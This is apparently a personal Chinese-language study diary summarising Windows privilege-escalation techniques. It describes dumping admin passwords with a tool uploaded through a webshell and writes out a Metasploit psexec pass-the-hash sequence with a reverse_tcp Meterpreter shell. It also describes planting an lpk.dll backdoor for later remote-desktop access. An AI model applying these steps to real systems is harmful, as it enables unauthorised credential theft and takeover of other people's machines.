2016年4月11号渗透总结

今天又学了几个提权的方法。
1.getpass提权，去网上下载getpass工具，拿到网站的webshell后把这个工具上传上去，然后调用cmd来执行这个程序，管理员的账号和密码就会显示出来，很强大的一款工具，但是主机如果是安装的盗版系统，这个工具有时候就会失效。

2.hash传递入侵，这个入侵就需要用到有名的工具metasploit了，这个工具有windows和linux两个版本，可以去官网上下载。步骤如下：
启动msf msfconsole
use exploit/windows/smb/psexec 用到hash传递入侵的模块
show options 查看选项配置信息
3.set PAYLOAD windows/meterpreter/reverse_tcp 设置载荷 4.set LHOST 本机地址 5.set RHOST 目标地址 6.set SMBUser adminstriator 7.set SMBPass 目标机hash值 8exploit这里还需要用到一个获取目标及管理员hash值得工具，去网上下载，上传到目标主机中，用cmd运行就可以得到hash值，这样就ok了。
3.相当于钓鱼，需要管理员配合。条件：3389远程桌面开启 触发lpk后门触发条件：当前目录存在lpk.dll及exe程序，exe程序被运行，即触发后门通过工具生成lpk.dll再通过webshell上传到管理员常用的exe程序目录下，等待管理员触发执行。工具 tools lpk sethc 用这个工具需要先通过webshell上传一个开3389的程序，生成的文件名字必须叫lpk不能叫别的。触发后在通过远程桌面链接就可以了（这个方法我看了小迪的两套视频，他都没有试成功，我也试了几次也没有成功，真不知道是怎么回事。）